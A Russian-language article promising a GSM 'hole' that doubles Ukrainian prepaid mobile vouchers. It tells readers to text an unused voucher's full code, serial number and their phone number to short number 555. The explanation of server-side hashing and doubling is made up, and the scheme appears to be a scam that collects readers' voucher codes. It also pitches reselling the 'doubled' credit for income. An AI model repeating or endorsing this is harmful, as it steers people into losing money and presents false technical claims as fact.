Эта статья целиком посвящена любителям дешёвой мобильной связи, и если Вам всерьёз надоело работать на свой мобильник или занимать деньги, то я не могу порекомендовать ничего иного, как прочитать эту статью и освоить изложенный материал. В статье будет описываться достаточно простой способ, позволяющий удваивать на сервере номинал ваучера. Прочитав эту статью, Вы научитесь экономить на мобильной связи, а именно - разговаривать в два раза больше! А почему бы и не обмануть мошенника-оператора, который с каждым днём рекламирует тарифы всё дешёвле и дешевле, но с каждым днём расходы на мобильную связь увеличиваются. Например, если раньше услуга DJUICE-ночь действовала всю ночь, т.е. можно было спокойно болтать с 12 ночи до 6 утра, то сейчас можно говорить только полчаса, т.к. обрывается связь. Потом надо снова перезванивать, плати им 27 копеек каждые полчаса! Даже не 27, а 29, ибо обманывают, проверьте сами!

Прежде, чем выкладывать статью, хотелось бы предупредить тех, кто хочет пополнить свой счёт путем комбинаций *124*10*380671234567# и *125*0001#. Ни в коем случае не набирайте такие комбинации, так как деньги уходят негодяю, номер которого 380671234567. Возможно, Вас попросят набрать комбинацию *126*XXXXXXXXXXXXXX*380971234567# - это значит, что Вы пополните своим кодом счёт той же редиске, номер которой 380971234567. Для того чтобы не стать жертвой такого обмана, внимательно ознакомьтесь с услугами компании Kyivstar, а именно с переводом денежных средств и пополнением счёта другого абонента.

Описание

На сегодня в GSM-протоколе остаётся немало дыр, и одной из самых главных дыр является SMS. Итак, здесь описан новенький секрет двойного пополнения счёта при помощи одной из дыр, найденных в GSM-протоколе. Этот способ не является незаконным, поэтому никто Вас вычислять не станет. Стоит потратить всего 5 минут времени и от 5 до 30 копеек на отправку SMS(в зависимости от тарифного плана), после чего простая карточка на 25 - 50 грн. пополнит Ваш счёт на 50 - 100 грн. Всё проверено и работает безупречно. Этот секрет нашёл естественно не я, а некоторые "народные умельцы", благодаря которым уже сотни человек пользуются этим на своё благо. Сейчас на Украине почти 90% населения являются абонентами Kyivstar, Djuice, UMC, Jeans, Life, Beeline. И если учесть, что этим секретом владеют всего 500 - 1000 человек, админы просто не обратят на это внимания. Как говорится: "Если от многого взяли немножко, то это не кража, а просто делёжка". Когда Вы вводите код пополнения *123*код#, Ваши данные обрабатываются на базе данных Kyivstar стандартным образом. Но самое интересное, что этим занимается не человек, а машина, т.е. специальная программа. А если есть программа – есть ошибки. Теперь приступим к описанию конкретных действий. Тут все просто. Следуйте по нижепредставленным инструкциям, и Вы будете обладателем одного из секретов украинского "дырявого" GSM-протокола. Итак, Вы приобрели новую карточку для пополнения счёта. Простое пополнение вида *123*XXXXXXXXXXXXXX# приводит к стандартному пополнению счёта. Что же приведёт к двойному пополнению счёта? Существует два основных метода пополнения счёта: через технологию USSD (Unstructured Supplementary Service Data), а именно комбинацией *123*код#, и через меню услуг (номер *433). Как это происходит: абонент вводит код и отправляет запрос, потом сигнал получает базовая станция, которая проверяет на сервере значения, и в случае, если код найден, на Ваш счёт зачисляется определённая сумма. Счёт абонента находится на сервере, а не на SIM-карте, поэтому счёт пополнится даже, если абонент находится вне зоны действия сигнала, или отключил телефон. С учётом, того, что все коды скретч-карт находятся на сервере и все средства коммуникаций взаимосвязаны, можно с помощью того же мобильного телефона удвоить на сервере номинал скретч-карты при помощи SMS. У оператора Kyivstar, Ace&Base, Djuice это делается отправкой SMS на сервисный номер 555. Приступаем к описанию конкретных действий.

Алгоритм

1. Прежде чем отправлять SMS, сначала необходимо активировать услугу отправки и приёма электронных запросов. Делается это отправкой пустого SMS-сообщения на номер 7021. Данная услуга позволит Вам получать и отправлять дополнительные служебные сообщения, а также получать SMS-сообщения, отосланные со специальных интернет-сайтов. Активация услуги – номер 7021, деактивация услуги – номер 7020, проверка состояния услуги – номер 7022 (более подробно об услуге можно узнать у оператора по телефону 466). После того, как придёт сообщение, что услуга активирована, приступайте к следующему пункту.

2. Создайте новое SMS с таким содержимым:

AA-KYIVSTAR*UKR.NET(пробел)BB*XXXXXXXXXXXXXX*YYYYYYYYYYYY*ZZZZZZZ#

где:

AA-KYIVSTAR - код мобильного оператора. Зависит от Вашего номера телефона: если Ваш номер - 380971234567, то вместо "AA-KYIVSTAR" пишите "97-kyivstar". Пишется так, как показано в таблице: Номер телефона Вместо AA-KYIVSTAR
38-067-XXX-XXXX 67-kyivstar
38-096-XXX-XXXX 96-kyivstar 3
8-097-XXX-XXXX 97-kyivstar
38-098-XXX-XXXX 98-kyivstar

BB - номинал карточки. Если указан несуществующий номинал, например 30, двойного пополнения не произойдёт.

XXXXXXXXXXXXXX - код пополнения, который необходимо удвоить (14 цифр). Если ваучер несуществующий или использованный - Ваш номер после отправки SMS может быть определён оператором сети.

YYYYYYYYYYYY - серийный номер ваучера (12 цифр). Сервер создает хеш (hash) от этого номера (по стандартному алгоритму хеширования GSM для ваучеров) и сверяет его с первыми 10 цифрами секретного кода ваучера. Возможно, Вы обратили внимание, что когда Вы просите оператора (поддержка пользователей) пополнить Ваш счёт, он требует именно серийный номер и первые 10 цифр кода (например, когда заблокировали счёт). Проверьте внимательно, серийный номер и код ваучера должны быть без ошибок набраны в SMS.

ZZZZZZZ - здесь Вы указываете свой мобильный номер (7 цифр). Обязательно проверяйте правильность своего номера, потому что после отправки запроса, серверу не будет известно, какой именно номер пополнять. Он проиндексирует ваучер, а кому его зачислять – останется для него загадкой. Начиная сразу после кода, введите последние 7 цифр своего номера. Проверяйте трижды вводимую Вами комбинацию! Знаки "*" и "#" обязательны, вводятся без пробелов. Все символы должны быть английскими.

Пример текста сообщения:

97-kyivstar*UKR.NET 25*64124184264486*206919017489*7855484#

3. Отправьте это SMS-сообщение на номер 555 (для абонентов Kyivstar, Djuice, Ace&Base). Убедитесь, что после отправки пришёл отчёт о доставке. Стоимость отправки сообщения на номер 555 стандартная (от 5 до 30 коп в зависимости от тарифных планов). Отправка SMS-сообщения происходит через выделенный шлюз сервера служебных сообщений, что гарантирует полную конфиденциальность содержимого электронного пакета данных. В течении 24-х часов с момента отправки SMS должен прийти ответ о выполненной операции. Обычно он приходит через 12 - 16 часов после отправки SMS в зависимости от загруженности сервера. После того как пришёл ответ с сервера, пополните Ваш счёт этим же кодом стандартным образом - *123*XXXXXXXXXXXXXX# (где XXXXXXXXXXXXXX - уже удвоенный код ваучера). Но Вы увидите, что при пополнении карточкой на 25 грн. оператор сообщит Вам, что счёт пополнен на 50 грн., а не на 25. Никаких чудес - описанная выше SMS просто удваивает на сервере номинал ваучера. Если Вы в течении 24-х часов всё-таки не дождались ответа (бывает и такое, но в очень редких случаях), просто пополнитесь стандартным образом. Код не будет удвоен, попробуйте в следующий раз. Важно: не отправляйте повторно такую SMS, если не пришёл ответ с сервера – в целях безопасности не нужно "пытать" сервер запросами.

Комментарий. Выполняем операцию, описанную в статье. В данном случае я приобрёл ваучер Kyivstar (у меня Djuice) на 25 грн, для пополнения на 50. После прихода ответа от сервера пополняемся этим же кодом и видим: на счёт зачислено 50 грн. Никаких чудес здесь нет, такова технология. На дисплее телефона отображено состояние моего счёта. Ни много, ни мало - 130 грн. Спасибо народным умельцам! :)

Внимание! Двойное пополнение счёта происходит только с ваучерами номиналом 25, 50, 100 и 300 грн.

Я вам также предлагаю на этом уникальном способе очень хорошо заработать, что и я делаю последнее время, и это приносит мне очень огромный доход. Работа состоит в следующем. По началу покупаете карточку на ту суму, которую позволяет ваш бюджет и пополняете по инструкции счёт. После того как сума удвоится, вы идете к человеку, который пополняет счёт(они обычно стоят возле метро) и говорите, что хотите ему переслать например 100 гривен, а он вам за это заплатит 90. И ему выгодно, так как он заработает 10 гривен от фонаря, и вам выгодно – вы тоже заработаете 40 гривен (если пополнили счёт карточкой на 50 гривен, то удвоенная сумма – 100 грн.). Я так попробовал изначально, и был очень рад. Но вы только представьте, как я был рад, когда после покупки карточки на 300 гривен, я пошёл и переслал шестьсот за 580 наличкой, заработав на ровном месте 280 гривен. Сейчас я обычно покупаю две карточки номиналом 300 гривен каждый день, и зарабатываю как минимум по 560 гривен за один день. Иногда, когда мне надо, даже по тысяче. На счету у меня абсолютно всегда как минимум триста-четыреста гривен, разве не сказка? В месяц я зарабатываю почти что не 10 000 гривен, то есть 2000 долларов. В это время ещё и успеваю учиться в университете. Это для меня оптимальный вариант, так как работать на высокооплачиваемой работе и хорошо учиться – это практически нереальные вещи, скажу я вам из своего опыта.
Но это ваше дело, как использовать данную слабость сети GSM этого оператора, во всяком случае разговаривать в два раза дешевле – это тоже очень хорошо.

Существуют также слухи, что если на двух мобильных телефонах одинаковой модели на Kiyvstar ввести *123*код# и одновременно нажать ОК, пополнение произойдёт на обеих номерах. Но лично мною это ещё не проверено. Если кто хочет, можете проверить и сообщить мне.

Удачи всем!